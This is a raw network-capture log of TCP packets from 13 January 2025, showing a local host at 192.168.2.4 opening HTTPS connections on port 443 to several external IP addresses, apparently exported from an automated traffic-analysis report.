                                                                  Jan 13, 2025 22:52:24.769496918 CET49748443192.168.2.4142.250.185.228
                                                                  Jan 13, 2025 22:52:24.769582987 CET44349748142.250.185.228192.168.2.4
                                                                  Jan 13, 2025 22:52:24.769632101 CET49748443192.168.2.4142.250.185.228
                                                                  Jan 13, 2025 22:52:24.769671917 CET44349748142.250.185.228192.168.2.4
                                                                  Jan 13, 2025 22:52:24.823925972 CET49748443192.168.2.4142.250.185.228
                                                                  Jan 13, 2025 22:52:25.006407022 CET44349748142.250.185.228192.168.2.4
                                                                  Jan 13, 2025 22:52:25.006520033 CET44349748142.250.185.228192.168.2.4
                                                                  Jan 13, 2025 22:52:25.006681919 CET49748443192.168.2.4142.250.185.228
                                                                  Jan 13, 2025 22:52:25.006934881 CET49748443192.168.2.4142.250.185.228
                                                                  Jan 13, 2025 22:52:25.006977081 CET44349748142.250.185.228192.168.2.4
                                                                  Jan 13, 2025 22:52:25.042092085 CET49749443192.168.2.4103.83.194.55
                                                                  Jan 13, 2025 22:52:25.042151928 CET44349749103.83.194.55192.168.2.4
                                                                  Jan 13, 2025 22:52:25.042337894 CET49749443192.168.2.4103.83.194.55
                                                                  Jan 13, 2025 22:52:25.042438984 CET49749443192.168.2.4103.83.194.55
                                                                  Jan 13, 2025 22:52:25.042454004 CET44349749103.83.194.55192.168.2.4
                                                                  Jan 13, 2025 22:52:25.691402912 CET44349749103.83.194.55192.168.2.4
                                                                  Jan 13, 2025 22:52:25.694331884 CET49749443192.168.2.4103.83.194.55
                                                                  Jan 13, 2025 22:52:25.694367886 CET44349749103.83.194.55192.168.2.4
                                                                  Jan 13, 2025 22:52:25.696095943 CET44349749103.83.194.55192.168.2.4
                                                                  Jan 13, 2025 22:52:25.696202040 CET49749443192.168.2.4103.83.194.55
                                                                  Jan 13, 2025 22:52:25.701046944 CET49749443192.168.2.4103.83.194.55
                                                                  Jan 13, 2025 22:52:25.701162100 CET44349749103.83.194.55192.168.2.4
                                                                  Jan 13, 2025 22:52:25.701277971 CET49749443192.168.2.4103.83.194.55
                                                                  Jan 13, 2025 22:52:25.747334003 CET44349749103.83.194.55192.168.2.4
                                                                  Jan 13, 2025 22:52:25.748817921 CET49749443192.168.2.4103.83.194.55
                                                                  Jan 13, 2025 22:52:25.748850107 CET44349749103.83.194.55192.168.2.4
                                                                  Jan 13, 2025 22:52:25.795295954 CET49749443192.168.2.4103.83.194.55
                                                                  Jan 13, 2025 22:52:25.934261084 CET44349749103.83.194.55192.168.2.4
                                                                  Jan 13, 2025 22:52:25.934453011 CET44349749103.83.194.55192.168.2.4
                                                                  Jan 13, 2025 22:52:25.934511900 CET49749443192.168.2.4103.83.194.55
                                                                  Jan 13, 2025 22:52:25.934817076 CET49749443192.168.2.4103.83.194.55
                                                                  Jan 13, 2025 22:52:25.934840918 CET44349749103.83.194.55192.168.2.4
                                                                  Jan 13, 2025 22:52:25.934859037 CET49749443192.168.2.4103.83.194.55
                                                                  Jan 13, 2025 22:52:25.934889078 CET49749443192.168.2.4103.83.194.55
                                                                  Jan 13, 2025 22:52:25.989510059 CET49750443192.168.2.4103.83.194.55
                                                                  Jan 13, 2025 22:52:25.989590883 CET44349750103.83.194.55192.168.2.4
                                                                  Jan 13, 2025 22:52:25.989677906 CET49750443192.168.2.4103.83.194.55
                                                                  Jan 13, 2025 22:52:25.989876032 CET49750443192.168.2.4103.83.194.55
                                                                  Jan 13, 2025 22:52:25.989893913 CET44349750103.83.194.55192.168.2.4
                                                                  Jan 13, 2025 22:52:26.103432894 CET49751443192.168.2.4104.21.92.210
                                                                  Jan 13, 2025 22:52:26.103456974 CET44349751104.21.92.210192.168.2.4
                                                                  Jan 13, 2025 22:52:26.103514910 CET49751443192.168.2.4104.21.92.210
                                                                  Jan 13, 2025 22:52:26.103842020 CET49752443192.168.2.4104.21.92.210
                                                                  Jan 13, 2025 22:52:26.103935957 CET44349752104.21.92.210192.168.2.4
                                                                  Jan 13, 2025 22:52:26.104020119 CET49752443192.168.2.4104.21.92.210
                                                                  Jan 13, 2025 22:52:26.104155064 CET49751443192.168.2.4104.21.92.210
                                                                  Jan 13, 2025 22:52:26.104170084 CET44349751104.21.92.210192.168.2.4
                                                                  Jan 13, 2025 22:52:26.104310989 CET49752443192.168.2.4104.21.92.210
                                                                  Jan 13, 2025 22:52:26.104351044 CET44349752104.21.92.210192.168.2.4
                                                                  Jan 13, 2025 22:52:26.565155029 CET44349752104.21.92.210192.168.2.4
                                                                  Jan 13, 2025 22:52:26.565447092 CET49752443192.168.2.4104.21.92.210
                                                                  Jan 13, 2025 22:52:26.565514088 CET44349752104.21.92.210192.168.2.4
                                                                  Jan 13, 2025 22:52:26.566402912 CET44349752104.21.92.210192.168.2.4
                                                                  Jan 13, 2025 22:52:26.566485882 CET49752443192.168.2.4104.21.92.210
                                                                  Jan 13, 2025 22:52:26.567312002 CET49752443192.168.2.4104.21.92.210
                                                                  Jan 13, 2025 22:52:26.567377090 CET44349752104.21.92.210192.168.2.4
                                                                  Jan 13, 2025 22:52:26.567455053 CET49752443192.168.2.4104.21.92.210
                                                                  Jan 13, 2025 22:52:26.567473888 CET44349752104.21.92.210192.168.2.4
                                                                  Jan 13, 2025 22:52:26.589524984 CET44349751104.21.92.210192.168.2.4
                                                                  Jan 13, 2025 22:52:26.589755058 CET49751443192.168.2.4104.21.92.210
                                                                  Jan 13, 2025 22:52:26.589817047 CET44349751104.21.92.210192.168.2.4
                                                                  Jan 13, 2025 22:52:26.591399908 CET44349751104.21.92.210192.168.2.4
                                                                  Jan 13, 2025 22:52:26.591475964 CET49751443192.168.2.4104.21.92.210
                                                                  Jan 13, 2025 22:52:26.592276096 CET49751443192.168.2.4104.21.92.210
                                                                  Jan 13, 2025 22:52:26.592370033 CET44349751104.21.92.210192.168.2.4
                                                                  Jan 13, 2025 22:52:26.616420031 CET49752443192.168.2.4104.21.92.210
                                                                  Jan 13, 2025 22:52:26.646612883 CET49751443192.168.2.4104.21.92.210
                                                                  Jan 13, 2025 22:52:26.646676064 CET44349751104.21.92.210192.168.2.4
                                                                  Jan 13, 2025 22:52:26.684196949 CET44349750103.83.194.55192.168.2.4
                                                                  Jan 13, 2025 22:52:26.696630001 CET49751443192.168.2.4104.21.92.210
                                                                  Jan 13, 2025 22:52:26.702964067 CET49750443192.168.2.4103.83.194.55
                                                                  Jan 13, 2025 22:52:26.703030109 CET44349750103.83.194.55192.168.2.4
                                                                  Jan 13, 2025 22:52:26.703471899 CET44349750103.83.194.55192.168.2.4
                                                                  Jan 13, 2025 22:52:26.704649925 CET49750443192.168.2.4103.83.194.55
                                                                  Jan 13, 2025 22:52:26.704718113 CET44349750103.83.194.55192.168.2.4
                                                                  Jan 13, 2025 22:52:26.704780102 CET49750443192.168.2.4103.83.194.55
                                                                  Jan 13, 2025 22:52:26.751337051 CET44349750103.83.194.55192.168.2.4
                                                                  Jan 13, 2025 22:52:26.933264971 CET44349750103.83.194.55192.168.2.4
                                                                  Jan 13, 2025 22:52:26.933336973 CET44349750103.83.194.55192.168.2.4
                                                                  Jan 13, 2025 22:52:26.933501959 CET49750443192.168.2.4103.83.194.55
                                                                  Jan 13, 2025 22:52:26.934381008 CET49750443192.168.2.4103.83.194.55
                                                                  Jan 13, 2025 22:52:26.934422016 CET44349750103.83.194.55192.168.2.4
                                                                  Jan 13, 2025 22:52:27.330913067 CET44349752104.21.92.210192.168.2.4
                                                                  Jan 13, 2025 22:52:27.331017971 CET44349752104.21.92.210192.168.2.4
                                                                  Jan 13, 2025 22:52:27.331060886 CET44349752104.21.92.210192.168.2.4
                                                                  Jan 13, 2025 22:52:27.331074953 CET49752443192.168.2.4104.21.92.210
                                                                  Jan 13, 2025 22:52:27.331149101 CET44349752104.21.92.210192.168.2.4
                                                                  Jan 13, 2025 22:52:27.331192970 CET49752443192.168.2.4104.21.92.210
                                                                  Jan 13, 2025 22:52:27.331202984 CET44349752104.21.92.210192.168.2.4
                                                                  Jan 13, 2025 22:52:27.331244946 CET49752443192.168.2.4104.21.92.210
                                                                  Jan 13, 2025 22:52:27.331262112 CET44349752104.21.92.210192.168.2.4
                                                                  Jan 13, 2025 22:52:27.331396103 CET44349752104.21.92.210192.168.2.4
                                                                  Jan 13, 2025 22:52:27.331448078 CET49752443192.168.2.4104.21.92.210
                                                                  Jan 13, 2025 22:52:27.331463099 CET44349752104.21.92.210192.168.2.4
                                                                  Jan 13, 2025 22:52:27.335583925 CET44349752104.21.92.210192.168.2.4
                                                                  Jan 13, 2025 22:52:27.335617065 CET44349752104.21.92.210192.168.2.4
                                                                  Jan 13, 2025 22:52:27.335653067 CET49752443192.168.2.4104.21.92.210
                                                                  Jan 13, 2025 22:52:27.335668087 CET44349752104.21.92.210192.168.2.4
                                                                  Jan 13, 2025 22:52:27.336349010 CET49752443192.168.2.4104.21.92.210
                                                                  Jan 13, 2025 22:52:27.417145014 CET44349752104.21.92.210192.168.2.4
                                                                  Jan 13, 2025 22:52:27.417222977 CET44349752104.21.92.210192.168.2.4
                                                                  Jan 13, 2025 22:52:27.417301893 CET49752443192.168.2.4104.21.92.210
                                                                  Jan 13, 2025 22:52:27.417362928 CET44349752104.21.92.210192.168.2.4
                                                                  Jan 13, 2025 22:52:27.417414904 CET44349752104.21.92.210192.168.2.4
                                                                  Jan 13, 2025 22:52:27.417422056 CET49752443192.168.2.4104.21.92.210
                                                                  Jan 13, 2025 22:52:27.417535067 CET49752443192.168.2.4104.21.92.210
                                                                  Jan 13, 2025 22:52:27.437633991 CET49752443192.168.2.4104.21.92.210
                                                                  Jan 13, 2025 22:52:27.437664032 CET44349752104.21.92.210192.168.2.4
                                                                  Jan 13, 2025 22:52:27.592612028 CET49753443192.168.2.4151.101.2.137
                                                                  Jan 13, 2025 22:52:27.592669964 CET44349753151.101.2.137192.168.2.4
                                                                  Jan 13, 2025 22:52:27.592742920 CET49753443192.168.2.4151.101.2.137
                                                                  Jan 13, 2025 22:52:27.592964888 CET49753443192.168.2.4151.101.2.137
                                                                  Jan 13, 2025 22:52:27.592998981 CET44349753151.101.2.137192.168.2.4
                                                                  Jan 13, 2025 22:52:27.594474077 CET49754443192.168.2.4104.18.94.41
                                                                  Jan 13, 2025 22:52:27.594563961 CET44349754104.18.94.41192.168.2.4
                                                                  Jan 13, 2025 22:52:27.594640970 CET49754443192.168.2.4104.18.94.41
                                                                  Jan 13, 2025 22:52:27.594907999 CET49754443192.168.2.4104.18.94.41
                                                                  Jan 13, 2025 22:52:27.594944954 CET44349754104.18.94.41192.168.2.4
                                                                  Jan 13, 2025 22:52:27.596569061 CET49755443192.168.2.4104.17.25.14
                                                                  Jan 13, 2025 22:52:27.596592903 CET44349755104.17.25.14192.168.2.4
                                                                  Jan 13, 2025 22:52:27.596707106 CET49755443192.168.2.4104.17.25.14
                                                                  Jan 13, 2025 22:52:27.596868992 CET49755443192.168.2.4104.17.25.14
                                                                  Jan 13, 2025 22:52:27.596880913 CET44349755104.17.25.14192.168.2.4
                                                                  Jan 13, 2025 22:52:28.069583893 CET44349753151.101.2.137192.168.2.4
                                                                  Jan 13, 2025 22:52:28.070656061 CET49753443192.168.2.4151.101.2.137
                                                                  Jan 13, 2025 22:52:28.070719957 CET44349753151.101.2.137192.168.2.4
                                                                  Jan 13, 2025 22:52:28.072418928 CET44349753151.101.2.137192.168.2.4
                                                                  Jan 13, 2025 22:52:28.072490931 CET49753443192.168.2.4151.101.2.137
                                                                  Jan 13, 2025 22:52:28.074249983 CET49753443192.168.2.4151.101.2.137
                                                                  Jan 13, 2025 22:52:28.074345112 CET44349753151.101.2.137192.168.2.4
                                                                  Jan 13, 2025 22:52:28.074425936 CET49753443192.168.2.4151.101.2.137
                                                                  Jan 13, 2025 22:52:28.078865051 CET44349754104.18.94.41192.168.2.4
                                                                  Jan 13, 2025 22:52:28.080290079 CET49754443192.168.2.4104.18.94.41
                                                                  Jan 13, 2025 22:52:28.080337048 CET44349754104.18.94.41192.168.2.4
                                                                  Jan 13, 2025 22:52:28.081825972 CET44349754104.18.94.41192.168.2.4
                                                                  Jan 13, 2025 22:52:28.081924915 CET49754443192.168.2.4104.18.94.41
                                                                  Jan 13, 2025 22:52:28.082700968 CET49754443192.168.2.4104.18.94.41
                                                                  Jan 13, 2025 22:52:28.082811117 CET44349754104.18.94.41192.168.2.4
                                                                  Jan 13, 2025 22:52:28.082989931 CET49754443192.168.2.4104.18.94.41
                                                                  Jan 13, 2025 22:52:28.083008051 CET44349754104.18.94.41192.168.2.4
                                                                  Jan 13, 2025 22:52:28.083041906 CET44349755104.17.25.14192.168.2.4
                                                                  Jan 13, 2025 22:52:28.083201885 CET49755443192.168.2.4104.17.25.14
                                                                  Jan 13, 2025 22:52:28.083214998 CET44349755104.17.25.14192.168.2.4
                                                                  Jan 13, 2025 22:52:28.084886074 CET44349755104.17.25.14192.168.2.4
                                                                  Jan 13, 2025 22:52:28.084963083 CET49755443192.168.2.4104.17.25.14
                                                                  Jan 13, 2025 22:52:28.086849928 CET49755443192.168.2.4104.17.25.14
                                                                  Jan 13, 2025 22:52:28.086941957 CET44349755104.17.25.14192.168.2.4
                                                                  Jan 13, 2025 22:52:28.087136984 CET49755443192.168.2.4104.17.25.14
                                                                  Jan 13, 2025 22:52:28.087150097 CET44349755104.17.25.14192.168.2.4
                                                                  Jan 13, 2025 22:52:28.115330935 CET44349753151.101.2.137192.168.2.4
                                                                  Jan 13, 2025 22:52:28.115483999 CET49753443192.168.2.4151.101.2.137
                                                                  Jan 13, 2025 22:52:28.115544081 CET44349753151.101.2.137192.168.2.4
                                                                  Jan 13, 2025 22:52:28.132477045 CET49754443192.168.2.4104.18.94.41
                                                                  Jan 13, 2025 22:52:28.132477999 CET49755443192.168.2.4104.17.25.14
                                                                  Jan 13, 2025 22:52:28.162867069 CET49753443192.168.2.4151.101.2.137
                                                                  Jan 13, 2025 22:52:28.176268101 CET44349753151.101.2.137192.168.2.4
                                                                  Jan 13, 2025 22:52:28.176378012 CET44349753151.101.2.137192.168.2.4
                                                                  Jan 13, 2025 22:52:28.176481962 CET44349753151.101.2.137192.168.2.4
                                                                  Jan 13, 2025 22:52:28.176512003 CET44349753151.101.2.137192.168.2.4
                                                                  Jan 13, 2025 22:52:28.176539898 CET44349753151.101.2.137192.168.2.4
                                                                  Jan 13, 2025 22:52:28.176556110 CET49753443192.168.2.4151.101.2.137
                                                                  Jan 13, 2025 22:52:28.176556110 CET49753443192.168.2.4151.101.2.137
                                                                  Jan 13, 2025 22:52:28.176573038 CET44349753151.101.2.137192.168.2.4
                                                                  Jan 13, 2025 22:52:28.176620007 CET44349753151.101.2.137192.168.2.4
                                                                  Jan 13, 2025 22:52:28.176667929 CET49753443192.168.2.4151.101.2.137
                                                                  Jan 13, 2025 22:52:28.177428961 CET44349753151.101.2.137192.168.2.4
                                                                  Jan 13, 2025 22:52:28.177462101 CET44349753151.101.2.137192.168.2.4
                                                                  Jan 13, 2025 22:52:28.177486897 CET44349753151.101.2.137192.168.2.4
                                                                  Jan 13, 2025 22:52:28.177494049 CET49753443192.168.2.4151.101.2.137
                                                                  Jan 13, 2025 22:52:28.177552938 CET44349753151.101.2.137192.168.2.4
                                                                  Jan 13, 2025 22:52:28.177602053 CET49753443192.168.2.4151.101.2.137
                                                                  Jan 13, 2025 22:52:28.181320906 CET44349753151.101.2.137192.168.2.4
                                                                  Jan 13, 2025 22:52:28.181372881 CET49753443192.168.2.4151.101.2.137
                                                                  Jan 13, 2025 22:52:28.192336082 CET44349753151.101.2.137192.168.2.4
                                                                  Jan 13, 2025 22:52:28.221781969 CET44349754104.18.94.41192.168.2.4
                                                                  Jan 13, 2025 22:52:28.221848965 CET44349754104.18.94.41192.168.2.4
                                                                  Jan 13, 2025 22:52:28.221901894 CET49754443192.168.2.4104.18.94.41
                                                                  Jan 13, 2025 22:52:28.222100019 CET49754443192.168.2.4104.18.94.41
                                                                  Jan 13, 2025 22:52:28.222136974 CET44349754104.18.94.41192.168.2.4
                                                                  Jan 13, 2025 22:52:28.222160101 CET49754443192.168.2.4104.18.94.41
                                                                  Jan 13, 2025 22:52:28.222203016 CET49754443192.168.2.4104.18.94.41
                                                                  Jan 13, 2025 22:52:28.223280907 CET49757443192.168.2.4104.18.94.41
                                                                  Jan 13, 2025 22:52:28.223320961 CET44349757104.18.94.41192.168.2.4
                                                                  Jan 13, 2025 22:52:28.223463058 CET49757443192.168.2.4104.18.94.41
                                                                  Jan 13, 2025 22:52:28.223635912 CET49757443192.168.2.4104.18.94.41
                                                                  Jan 13, 2025 22:52:28.223644972 CET44349757104.18.94.41192.168.2.4
                                                                  Jan 13, 2025 22:52:28.226887941 CET44349755104.17.25.14192.168.2.4
                                                                  Jan 13, 2025 22:52:28.227024078 CET44349755104.17.25.14192.168.2.4
                                                                  Jan 13, 2025 22:52:28.227081060 CET49755443192.168.2.4104.17.25.14
                                                                  Jan 13, 2025 22:52:28.227096081 CET44349755104.17.25.14192.168.2.4
                                                                  Jan 13, 2025 22:52:28.227185965 CET44349755104.17.25.14192.168.2.4
                                                                  Jan 13, 2025 22:52:28.227232933 CET49755443192.168.2.4104.17.25.14
                                                                  Jan 13, 2025 22:52:28.227246046 CET44349755104.17.25.14192.168.2.4
                                                                  Jan 13, 2025 22:52:28.227390051 CET44349755104.17.25.14192.168.2.4
                                                                  Jan 13, 2025 22:52:28.227468014 CET44349755104.17.25.14192.168.2.4
                                                                  Jan 13, 2025 22:52:28.227513075 CET49755443192.168.2.4104.17.25.14
                                                                  Jan 13, 2025 22:52:28.227526903 CET44349755104.17.25.14192.168.2.4
                                                                  Jan 13, 2025 22:52:28.227583885 CET49755443192.168.2.4104.17.25.14
                                                                  Jan 13, 2025 22:52:28.227596045 CET44349755104.17.25.14192.168.2.4
                                                                  Jan 13, 2025 22:52:28.227675915 CET44349755104.17.25.14192.168.2.4
                                                                  Jan 13, 2025 22:52:28.227750063 CET49755443192.168.2.4104.17.25.14
                                                                  Jan 13, 2025 22:52:28.227761984 CET44349755104.17.25.14192.168.2.4
                                                                  Jan 13, 2025 22:52:28.231415033 CET44349755104.17.25.14192.168.2.4
                                                                  Jan 13, 2025 22:52:28.231476068 CET49755443192.168.2.4104.17.25.14
                                                                  Jan 13, 2025 22:52:28.231494904 CET44349755104.17.25.14192.168.2.4
                                                                  Jan 13, 2025 22:52:28.240803957 CET49753443192.168.2.4151.101.2.137
                                                                  Jan 13, 2025 22:52:28.266875982 CET44349753151.101.2.137192.168.2.4
                                                                  Jan 13, 2025 22:52:28.266938925 CET44349753151.101.2.137192.168.2.4
                                                                  Jan 13, 2025 22:52:28.267003059 CET49753443192.168.2.4151.101.2.137
                                                                  Jan 13, 2025 22:52:28.267035961 CET44349753151.101.2.137192.168.2.4
                                                                  Jan 13, 2025 22:52:28.267251015 CET44349753151.101.2.137192.168.2.4
                                                                  Jan 13, 2025 22:52:28.267280102 CET44349753151.101.2.137192.168.2.4
                                                                  Jan 13, 2025 22:52:28.267309904 CET49753443192.168.2.4151.101.2.137
                                                                  Jan 13, 2025 22:52:28.267328024 CET44349753151.101.2.137192.168.2.4
                                                                  Jan 13, 2025 22:52:28.267452002 CET49753443192.168.2.4151.101.2.137
                                                                  Jan 13, 2025 22:52:28.267613888 CET44349753151.101.2.137192.168.2.4
                                                                  Jan 13, 2025 22:52:28.267654896 CET44349753151.101.2.137192.168.2.4
                                                                  Jan 13, 2025 22:52:28.267682076 CET44349753151.101.2.137192.168.2.4
                                                                  Jan 13, 2025 22:52:28.267708063 CET44349753151.101.2.137192.168.2.4
                                                                  Jan 13, 2025 22:52:28.267726898 CET49753443192.168.2.4151.101.2.137
                                                                  Jan 13, 2025 22:52:28.267740965 CET44349753151.101.2.137192.168.2.4
                                                                  Jan 13, 2025 22:52:28.267770052 CET49753443192.168.2.4151.101.2.137
                                                                  Jan 13, 2025 22:52:28.269289970 CET44349753151.101.2.137192.168.2.4
                                                                  Jan 13, 2025 22:52:28.269299030 CET44349753151.101.2.137192.168.2.4
                                                                  Jan 13, 2025 22:52:28.269351006 CET49753443192.168.2.4151.101.2.137
                                                                  Jan 13, 2025 22:52:28.269376993 CET44349753151.101.2.137192.168.2.4
                                                                  Jan 13, 2025 22:52:28.269421101 CET44349753151.101.2.137192.168.2.4
                                                                  Jan 13, 2025 22:52:28.269447088 CET44349753151.101.2.137192.168.2.4
                                                                  Jan 13, 2025 22:52:28.269469976 CET49753443192.168.2.4151.101.2.137
                                                                  Jan 13, 2025 22:52:28.269469976 CET49753443192.168.2.4151.101.2.137
                                                                  Jan 13, 2025 22:52:28.269495964 CET49753443192.168.2.4151.101.2.137
                                                                  Jan 13, 2025 22:52:28.272067070 CET49755443192.168.2.4104.17.25.14
                                                                  Jan 13, 2025 22:52:28.317346096 CET44349755104.17.25.14192.168.2.4
                                                                  Jan 13, 2025 22:52:28.317411900 CET44349755104.17.25.14192.168.2.4
                                                                  Jan 13, 2025 22:52:28.317462921 CET49755443192.168.2.4104.17.25.14
                                                                  Jan 13, 2025 22:52:28.317477942 CET44349755104.17.25.14192.168.2.4
                                                                  Jan 13, 2025 22:52:28.317533970 CET44349755104.17.25.14192.168.2.4
                                                                  Jan 13, 2025 22:52:28.317563057 CET49755443192.168.2.4104.17.25.14
                                                                  Jan 13, 2025 22:52:28.317857981 CET44349755104.17.25.14192.168.2.4
                                                                  Jan 13, 2025 22:52:28.317895889 CET44349755104.17.25.14192.168.2.4
                                                                  Jan 13, 2025 22:52:28.317914963 CET49755443192.168.2.4104.17.25.14
                                                                  Jan 13, 2025 22:52:28.317929983 CET44349755104.17.25.14192.168.2.4
                                                                  Jan 13, 2025 22:52:28.317964077 CET44349755104.17.25.14192.168.2.4
                                                                  Jan 13, 2025 22:52:28.317997932 CET44349755104.17.25.14192.168.2.4
                                                                  Jan 13, 2025 22:52:28.318006039 CET49755443192.168.2.4104.17.25.14
                                                                  Jan 13, 2025 22:52:28.318018913 CET44349755104.17.25.14192.168.2.4
                                                                  Jan 13, 2025 22:52:28.318046093 CET49755443192.168.2.4104.17.25.14
                                                                  Jan 13, 2025 22:52:28.318787098 CET44349755104.17.25.14192.168.2.4
                                                                  Jan 13, 2025 22:52:28.318819046 CET44349755104.17.25.14192.168.2.4
                                                                  Jan 13, 2025 22:52:28.318845987 CET49755443192.168.2.4104.17.25.14
                                                                  Jan 13, 2025 22:52:28.318855047 CET44349755104.17.25.14192.168.2.4
                                                                  Jan 13, 2025 22:52:28.318866014 CET44349755104.17.25.14192.168.2.4
                                                                  Jan 13, 2025 22:52:28.318897009 CET49755443192.168.2.4104.17.25.14
                                                                  Jan 13, 2025 22:52:28.319690943 CET44349755104.17.25.14192.168.2.4
                                                                  Jan 13, 2025 22:52:28.319720030 CET44349755104.17.25.14192.168.2.4
                                                                  Jan 13, 2025 22:52:28.319746971 CET49755443192.168.2.4104.17.25.14
                                                                  Jan 13, 2025 22:52:28.319751024 CET44349755104.17.25.14192.168.2.4
                                                                  Jan 13, 2025 22:52:28.319765091 CET44349755104.17.25.14192.168.2.4
                                                                  Jan 13, 2025 22:52:28.319814920 CET44349755104.17.25.14192.168.2.4
                                                                  Jan 13, 2025 22:52:28.319817066 CET49755443192.168.2.4104.17.25.14
                                                                  Jan 13, 2025 22:52:28.319844961 CET44349755104.17.25.14192.168.2.4
                                                                  Jan 13, 2025 22:52:28.319892883 CET49755443192.168.2.4104.17.25.14
                                                                  Jan 13, 2025 22:52:28.320648909 CET44349755104.17.25.14192.168.2.4
                                                                  Jan 13, 2025 22:52:28.320683956 CET44349755104.17.25.14192.168.2.4
                                                                  Jan 13, 2025 22:52:28.320688963 CET49755443192.168.2.4104.17.25.14
                                                                  Jan 13, 2025 22:52:28.320699930 CET44349755104.17.25.14192.168.2.4
                                                                  Jan 13, 2025 22:52:28.320795059 CET49755443192.168.2.4104.17.25.14
                                                                  Jan 13, 2025 22:52:28.320811987 CET44349755104.17.25.14192.168.2.4
                                                                  Jan 13, 2025 22:52:28.320831060 CET44349755104.17.25.14192.168.2.4
                                                                  Jan 13, 2025 22:52:28.320880890 CET49755443192.168.2.4104.17.25.14
                                                                  Jan 13, 2025 22:52:28.321357012 CET49755443192.168.2.4104.17.25.14
                                                                  Jan 13, 2025 22:52:28.321387053 CET44349755104.17.25.14192.168.2.4
                                                                  Jan 13, 2025 22:52:28.333034992 CET49758443192.168.2.4104.17.25.14
                                                                  Jan 13, 2025 22:52:28.333070993 CET44349758104.17.25.14192.168.2.4
                                                                  Jan 13, 2025 22:52:28.333144903 CET49758443192.168.2.4104.17.25.14
                                                                  Jan 13, 2025 22:52:28.333340883 CET49758443192.168.2.4104.17.25.14
                                                                  Jan 13, 2025 22:52:28.333357096 CET44349758104.17.25.14192.168.2.4
                                                                  Jan 13, 2025 22:52:28.357801914 CET44349753151.101.2.137192.168.2.4
                                                                  Jan 13, 2025 22:52:28.357821941 CET44349753151.101.2.137192.168.2.4
                                                                  Jan 13, 2025 22:52:28.358010054 CET49753443192.168.2.4151.101.2.137
                                                                  Jan 13, 2025 22:52:28.358010054 CET49753443192.168.2.4151.101.2.137
                                                                  Jan 13, 2025 22:52:28.358078003 CET44349753151.101.2.137192.168.2.4
                                                                  Jan 13, 2025 22:52:28.358154058 CET49753443192.168.2.4151.101.2.137
                                                                  Jan 13, 2025 22:52:28.359091043 CET44349753151.101.2.137192.168.2.4
                                                                  Jan 13, 2025 22:52:28.359108925 CET44349753151.101.2.137192.168.2.4
                                                                  Jan 13, 2025 22:52:28.359138012 CET44349753151.101.2.137192.168.2.4
                                                                  Jan 13, 2025 22:52:28.359177113 CET49753443192.168.2.4151.101.2.137
                                                                  Jan 13, 2025 22:52:28.359193087 CET44349753151.101.2.137192.168.2.4
                                                                  Jan 13, 2025 22:52:28.359220982 CET49753443192.168.2.4151.101.2.137
                                                                  Jan 13, 2025 22:52:28.359256029 CET44349753151.101.2.137192.168.2.4
                                                                  Jan 13, 2025 22:52:28.359344959 CET49753443192.168.2.4151.101.2.137
                                                                  Jan 13, 2025 22:52:28.359663963 CET49753443192.168.2.4151.101.2.137
                                                                  Jan 13, 2025 22:52:28.359689951 CET44349753151.101.2.137192.168.2.4
                                                                  Jan 13, 2025 22:52:28.382253885 CET49759443192.168.2.4151.101.130.137
                                                                  Jan 13, 2025 22:52:28.382298946 CET44349759151.101.130.137192.168.2.4
                                                                  Jan 13, 2025 22:52:28.382478952 CET49759443192.168.2.4151.101.130.137
                                                                  Jan 13, 2025 22:52:28.382688999 CET49759443192.168.2.4151.101.130.137
                                                                  Jan 13, 2025 22:52:28.382719994 CET44349759151.101.130.137192.168.2.4
                                                                  Jan 13, 2025 22:52:28.698151112 CET44349757104.18.94.41192.168.2.4
                                                                  Jan 13, 2025 22:52:28.698455095 CET49757443192.168.2.4104.18.94.41
                                                                  Jan 13, 2025 22:52:28.698466063 CET44349757104.18.94.41192.168.2.4
                                                                  Jan 13, 2025 22:52:28.698926926 CET44349757104.18.94.41192.168.2.4
                                                                  Jan 13, 2025 22:52:28.699603081 CET49757443192.168.2.4104.18.94.41
                                                                  Jan 13, 2025 22:52:28.699603081 CET49757443192.168.2.4104.18.94.41
                                                                  Jan 13, 2025 22:52:28.699616909 CET44349757104.18.94.41192.168.2.4
                                                                  Jan 13, 2025 22:52:28.699696064 CET44349757104.18.94.41192.168.2.4
                                                                  Jan 13, 2025 22:52:28.743205070 CET49757443192.168.2.4104.18.94.41
                                                                  Jan 13, 2025 22:52:28.795710087 CET44349758104.17.25.14192.168.2.4
                                                                  Jan 13, 2025 22:52:28.796016932 CET49758443192.168.2.4104.17.25.14
                                                                  Jan 13, 2025 22:52:28.796031952 CET44349758104.17.25.14192.168.2.4
                                                                  Jan 13, 2025 22:52:28.798403978 CET44349758104.17.25.14192.168.2.4
                                                                  Jan 13, 2025 22:52:28.798479080 CET49758443192.168.2.4104.17.25.14
                                                                  Jan 13, 2025 22:52:28.798837900 CET49758443192.168.2.4104.17.25.14
                                                                  Jan 13, 2025 22:52:28.798918009 CET44349758104.17.25.14192.168.2.4
                                                                  Jan 13, 2025 22:52:28.799094915 CET49758443192.168.2.4104.17.25.14
                                                                  Jan 13, 2025 22:52:28.799104929 CET44349758104.17.25.14192.168.2.4
                                                                  Jan 13, 2025 22:52:28.830815077 CET44349757104.18.94.41192.168.2.4
                                                                  Jan 13, 2025 22:52:28.830868006 CET44349757104.18.94.41192.168.2.4
                                                                  Jan 13, 2025 22:52:28.830899954 CET44349757104.18.94.41192.168.2.4
                                                                  Jan 13, 2025 22:52:28.830928087 CET44349757104.18.94.41192.168.2.4
                                                                  Jan 13, 2025 22:52:28.830945969 CET49757443192.168.2.4104.18.94.41
                                                                  Jan 13, 2025 22:52:28.830955982 CET44349757104.18.94.41192.168.2.4
                                                                  Jan 13, 2025 22:52:28.830974102 CET49757443192.168.2.4104.18.94.41
                                                                  Jan 13, 2025 22:52:28.831023932 CET44349757104.18.94.41192.168.2.4
                                                                  Jan 13, 2025 22:52:28.831195116 CET49757443192.168.2.4104.18.94.41
                                                                  Jan 13, 2025 22:52:28.831201077 CET44349757104.18.94.41192.168.2.4
                                                                  Jan 13, 2025 22:52:28.831775904 CET44349757104.18.94.41192.168.2.4
                                                                  Jan 13, 2025 22:52:28.831811905 CET44349757104.18.94.41192.168.2.4
                                                                  Jan 13, 2025 22:52:28.831845045 CET44349757104.18.94.41192.168.2.4
                                                                  Jan 13, 2025 22:52:28.831856012 CET49757443192.168.2.4104.18.94.41
                                                                  Jan 13, 2025 22:52:28.831864119 CET44349757104.18.94.41192.168.2.4
                                                                  Jan 13, 2025 22:52:28.831887007 CET49757443192.168.2.4104.18.94.41
                                                                  Jan 13, 2025 22:52:28.835519075 CET44349757104.18.94.41192.168.2.4
